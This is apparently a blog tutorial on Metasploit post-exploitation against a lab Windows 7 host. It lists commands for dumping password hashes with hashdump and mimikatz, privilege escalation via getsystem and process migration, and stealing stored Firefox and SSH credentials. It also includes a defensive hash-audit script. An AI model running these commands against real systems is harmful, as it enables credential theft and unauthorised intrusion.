Intranet information collection of Intranet penetration (3)
2022-07-06 14:29:00 【Unknown white hat】
Metasploit Intranet information collection
Attacker: Kali, 192.168.0.103
Target: Windows 7, 192.168.0.105
07 Password cracking
use post/windows/gather/hashdump // requires a meterpreter session with SYSTEM privileges
set session 1
exploit // the results are stored under the tmp directory
use post/windows/gather/smart_hashdump
set session 1
exploit
Output format:
username:RID:LM hash:NT hash
The RID is a fixed value associated with a Windows system account, similar to the uid and gid numbers on Linux: 500 is Administrator, 501 is Guest, and so on. The LM hash and the NT hash are both derived from the user's password, but they are computed with different methods.
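A defender-side reading of this output format, as an added example (not code from the original post or from Metasploit): it parses lines in the username:RID:LM hash:NT hash layout and flags stored LM hashes, blank passwords and accounts that share a password. The function names and sample lines are constructed for illustration, and the trailing `:::` is assumed from the usual pwdump-style layout.

```python
import re
from collections import defaultdict

# Well-known constants: the LM and NT hashes of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # also shown when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
BUILTIN_RIDS = {500: "Administrator", 501: "Guest"}  # fixed RIDs named in the text

LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):*$")

def parse(dump):
    """Return a list of account dicts; lines that do not match are skipped."""
    accounts = []
    for raw in dump.splitlines():
        m = LINE.match(raw.strip())
        if m:
            user, rid, lm, nt = m.groups()
            accounts.append({"user": user, "rid": int(rid),
                             "lm": lm.lower(), "nt": nt.lower()})
    return accounts

def audit(accounts):
    """Map each user name to a list of findings (empty list = nothing flagged)."""
    by_nt = defaultdict(list)  # NT hashes are unsalted: same hash means same password
    for a in accounts:
        by_nt[a["nt"]].append(a["user"])
    findings = {}
    for a in accounts:
        notes = []
        if a["rid"] in BUILTIN_RIDS:
            notes.append("built-in " + BUILTIN_RIDS[a["rid"]])
        if a["lm"] != EMPTY_LM:
            notes.append("LM hash stored")
        if a["nt"] == EMPTY_NT:
            notes.append("blank password")
        elif len(by_nt[a["nt"]]) > 1:
            others = [u for u in by_nt[a["nt"]] if u != a["user"]]
            notes.append("password shared with " + ", ".join(others))
        findings[a["user"]] = notes
    return findings

# Constructed sample input: hash values are made up, except the two empty-hash constants.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
olduser:1002:fedcba9876543210fedcba9876543210:00112233445566778899aabbccddeeff:::
[*] not a hash line
"""

if __name__ == "__main__":
    for user, notes in audit(parse(SAMPLE)).items():
        print(f"{user}: {'; '.join(notes) or 'no findings'}")
```

Accounts flagged as sharing a password or still storing an LM hash are the ones to rotate and harden first.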
hashdump uses part of the functionality of mimikatz.
load mimikatz
Commands: wdigest, kerberos, msv, ssp, tspkg, livessp
mimikatz_command -h
mimikatz_command -f a:: // query which modules are available
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
Privilege escalation for ordinary users
getuid
View user permissions.

hashdump
Needs administrator permission.

getsystem
This only appears to grant administrator permission; some real administrator privileges are still missing.

ps
Check the processes.

getpid
View the current process.

migrate
Process migration (migrate from an ordinary user's process to an administrator user's process).

hashdump
08 Other
Determine whether the target host is a virtual machine:
run checkvm
Get the software installation information on the target host:
run post/windows/gather/enum_applications
Get the most recently accessed documents and link information on the target host:
run post/windows/gather/dumplinks
View the target's environment information:
run post/windows/gather/env
View the accounts and passwords stored in Firefox:
run post/windows/gather/firefox_creds
View the encrypted SSH account password information and certificate information:
run post/windows/gather/ssh_creds